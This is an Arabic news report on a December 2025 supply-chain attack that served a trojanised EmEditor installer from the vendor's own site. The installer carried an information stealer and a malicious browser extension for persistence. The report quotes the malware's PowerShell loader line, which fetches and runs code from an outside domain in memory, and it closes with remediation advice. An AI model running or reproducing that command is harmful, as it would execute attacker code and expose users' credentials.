تعرض ملايين المستخدمين لخطر برمجيات تجسس معلوماتية متطورة، وذلك بعد هجوم تزامن سلاسل إمداد استهدف برنامج المحرر EmEditor، وهو محرر نصوص شائع الاستخدام. وقعت هذه الهجمات خلال الفترة من 19 إلى 22 ديسمبر 2025، حيث تم تعديل الموقع الرسمي لـ EmEditor لتقديم ملفات تثبيت مخترقة للمستخدمين.
أكدت الشركة أن المستخدمين الذين قاموا بتنزيل الإصدار 25.4.3 من خلال زر “Download Now” حصلوا على ملفات ضارة بدلاً من البرنامج الشرعي، مما يشكل خرقاً أمنياً كبيراً يؤثر على المطورين ومديري الأنظمة والمتخصصين التقنيين حول العالم.
الهجوم السيبراني على EmEditor: تفاصيل وأبعاد
استغل الهجوم آلية إعادة التوجيه التي تتحكم في مسار تنزيل EmEditor. قام المهاجمون بتغيير إعدادات عنوان URL التي كانت توجه المستخدمين عادةً إلى ملفات التثبيت الشرعية، وبدلاً من ذلك، تم توجيههم إلى نسخة ضارة مستضافة في مجلد محتوى WordPress الخاص بـ EmEditor.
تم توقيع المثبت المخترق رقمياً بواسطة “WALSHAM INVESTMENTS LIMITED”، وهي منظمة غير رسمية، بدلاً من Emurasoft Inc.، المطور الشرعي للبرنامج. هذا التوقيع المزيف أضاف طبقة مضللة من المصداقية قد لا يشكك فيها العديد من المستخدمين.
آلية الإصابة والتداعيات
قام محللو Qianxin بتحديد البرمجيات الخبيثة بعد فحص جنائي دقيق، وكشفوا عن حمولة شاملة لسرقة المعلومات مدمجة داخل حزمة التثبيت. أظهر الشفرة الخبيثة تصميماً متطوراً يحاكي وظائف EmEditor الشرعية، مما سمح لها بالعمل بصمت أثناء وبعد التثبيت، مع جمع بيانات المستخدم الحساسة.
تعمل آلية إصابة البرمجيات الخبيثة من خلال VBScript مدمج يقوم بتنفيذ أمر PowerShell: powershell.exe “irm emeditorjp.com | iex”. يقوم هذا الأمر بتنزيل وتنفيذ شفرة خبيثة إضافية مباشرة في ذاكرة النظام، متجاوزاً طرق الكشف التقليدية المستندة إلى الملفات.
تقوم الحمولة بسرقة بيانات الاعتماد من متصفحات الويب، بما في ذلك Chrome و Edge و Brave و Opera، حيث تلتقط ملفات تعريف الارتباط وبيانات تسجيل الدخول وسجل التصفح. كما تستهدف البرمجيات الخبيثة بيانات الاعتماد من تطبيقات الإنتاجية مثل Discord و Slack و Zoom و Microsoft Teams و WinSCP و PuTTY، مما يشكل خطراً شديداً على مستخدمي المؤسسات الذين يديرون اتصالات حساسة ووصولاً إلى البنية التحتية.
تستخدم البرمجيات الخبيثة تكتيكات المثابرة من خلال امتداد متصفح ضار يسمى “Google Drive Caching”، والذي يحافظ على وصول غير مصرح به حتى بعد الإصابة الأولية. يحتوي هذا الامتداد على قدرات خوارزميات توليد النطاقات (DGA)، مما يسمح للمهاجمين بإنشاء اتصالات قيادة وتحكم مرنة عبر نطاقات متعددة يتم إنشاؤها ديناميكياً.
يمكن للامتداد سرقة بيانات اعتماد حسابات إعلانات فيسبوك، ومراقبة أنشطة الحافظة لهجمات استبدال عناوين العملات المشفرة، وتنفيذ أوامر عن بعد لاستخراج بيانات إضافية أو التلاعب بسلوك المتصفح. يُنصح الضحايا بفصل الأنظمة المصابة على الفور، وإجراء عمليات مسح شاملة للبرمجيات الخبيثة، وإعادة تعيين جميع بيانات الاعتماد المستخدمة على الأجهزة المخترقة.